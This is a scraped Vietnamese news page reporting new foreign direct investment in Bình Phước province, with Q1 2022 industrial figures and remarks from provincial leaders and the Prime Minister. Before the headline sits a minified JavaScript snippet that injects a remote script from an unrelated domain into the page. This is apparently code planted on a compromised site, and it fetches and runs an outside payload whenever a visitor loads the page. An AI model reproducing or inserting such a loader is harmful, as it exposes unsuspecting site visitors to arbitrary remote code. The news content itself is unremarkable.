;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kinh tế Bình Phước thu hút thêm 9 dự án FDI

Kinh tế Bình Phước thu hút thêm 9 dự án FDI

Show all

Kinh tế Bình Phước thu hút thêm 9 dự án FDI

kinh-te-binh-phuoc

Quý một năm nay, Bình Phước có thêm 9 dự án đầu tư nước ngoài với số vốn đăng ký 30 triệu USD. Điều này đã giúp kinh tế Bình Phước ngày càng khởi sắc.

Bình Phước bắt đầu thu hút nhiều dự án FDI

Trước đó, năm 2021, tỉnh thu hút 63 dự án FDI với số vốn 514 triệu USD, tăng 88,5% về số dự án và gấp 3 lần về số vốn so với năm 2020. Lũy kế đến nay, trên địa bàn tỉnh có 346 dự án FDI với tổng vốn đăng ký hơn 3,579 tỷ USD, theo số liệu từ Tổng cục Thống kê.

Lãnh đạo tỉnh Bình Phước cho biết, với nền tảng ‘4 tốt’ gồm: hạ tầng, nhân lực, chính sách, dịch vụ công, tỉnh luôn hoan nghênh, chào đón các nhà đầu tư đến tìm hiểu và đầu tư.

“Tỉnh luôn sát cánh và đồng hành với doanh nghiệp; lắng nghe, chia sẻ và tháo gỡ khó khăn cho doanh nghiệp; tạo điều kiện thuận lợi cho doanh nghiệp đầu tư sản xuất – kinh doanh trên quê hương Bình Phước”, bà Trần Tuệ Hiền, Phó bí thư Tỉnh ủy, Chủ tịch UBND tỉnh nhấn mạnh.

Các chỉ số công nghiệp có nhiều khởi sắc

Hiện tỉnh huy động mọi nguồn lực để đầu tư phát triển kết cấu hạ tầng kỹ thuật hiện đại và đồng bộ; xây dựng hệ thống giao thông kết nối liên vùng và nội tỉnh; đẩy mạnh quy hoạch và đầu tư phát triển các khu, cụm công nghiệp, khu kinh tế cửa khẩu. Bên cạnh đó, địa phương cũng xúc tiến đầu tư trực tuyến; đẩy mạnh cải cách thủ tục hành chính; công khai quy trình xử lý công việc ở tất cả các cơ quan, đơn vị; tăng cường gặp gỡ, tiếp xúc với các hội, hiệp hội và doanh nghiệp để kịp thời tháo gỡ khó khăn cho doanh nghiệp.

Nhờ đó, từ một tỉnh với chủ lực là hàng nông sản đến nay, Bình Phước có thêm nhiều sản phẩm may mặc, linh kiện điện tử, gỗ ván ép, gia công cơ khí…

kinh-te-binh-phuoc

Quý I/2022, chỉ số phát triển sản xuất công nghiệp tăng 17,76% so với quý I/2021. Trong đó: Công nghiệp khai khoáng chỉ đạt 88,67% so với cùng kỳ năm trước; tương ứng: Công nghiệp chế biến, chế tạo tăng 19,08%; Công nghiệp sản xuất và phân phối điện, khí đốt, nước nóng, hơi nước và điều hòa không khí tăng 3,87%; Công nghiệp cung cấp nước, hoạt động quản lý và xử lý rác thải, nước thải tăng 5,80%.

Kinh tế Bình Phước phát triển nhanh chóng

Theo các chuyên gia, Bình Phước đang chuyển nhanh từ vị trí dự trữ phát triển sang động lực phát triển với nhiều thế mạnh, do đó nơi đây đang có cơ hội lớn trong việc đón làn sóng đầu tư.

Trong chuyến thăm và làm việc tại tỉnh Bình Phước vào ngày 20/3, Thủ tướng Phạm Minh Chính đánh giá cao những chính sách thu hút đầu tư của Bình Phước. Thủ tướng đề nghị tỉnh đẩy mạnh xây dựng các công trình hạ tầng kỹ thuật để tạo thêm sức thu hút nhiều doanh nghiệp tiếp cận và quyết định đầu tư. 

Thủ tướng cũng nhấn mạnh đến sự cần thiết phải có “bộ lọc” nhất định khi thu hút những dự án; trong đó cần thực hiện những dự án mang tính chiến lược, thực hiện tốt an sinh xã hội; chăm lo đời sống vật chất cho người lao động, nhà ở xã hội, hạ tầng y tế, văn hóa cho công nhân, an toàn lao động; cũng như áp dụng các biện pháp tối đa bảo vệ môi trường.

Bình Phước nằm trong vùng kinh tế trọng điểm phía Nam; có hạ tầng giao thông thuận lợi, kết nối với TP. HCM và các tỉnh miền Đông Nam Bộ thông qua quốc lộ 13, 14 và đường ĐT741 đã được đầu tư hoàn chỉnh với quy mô từ 6 đến 8 làn xe. 

Tỉnh có 15 khu công nghiệp với tổng diện tích hơn 4.686 ha và 8 cụm công nghiệp với diện tích 380 ha. Bên cạnh đó, tỉnh còn có khu kinh tế cửa khẩu quốc tế Hoa Lư, giáp Campuchia; giao thông thuận lợi để kết nối với Lào và Thái Lan.

Xem thêm:

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Tin Nổi Bật
0888 69 7779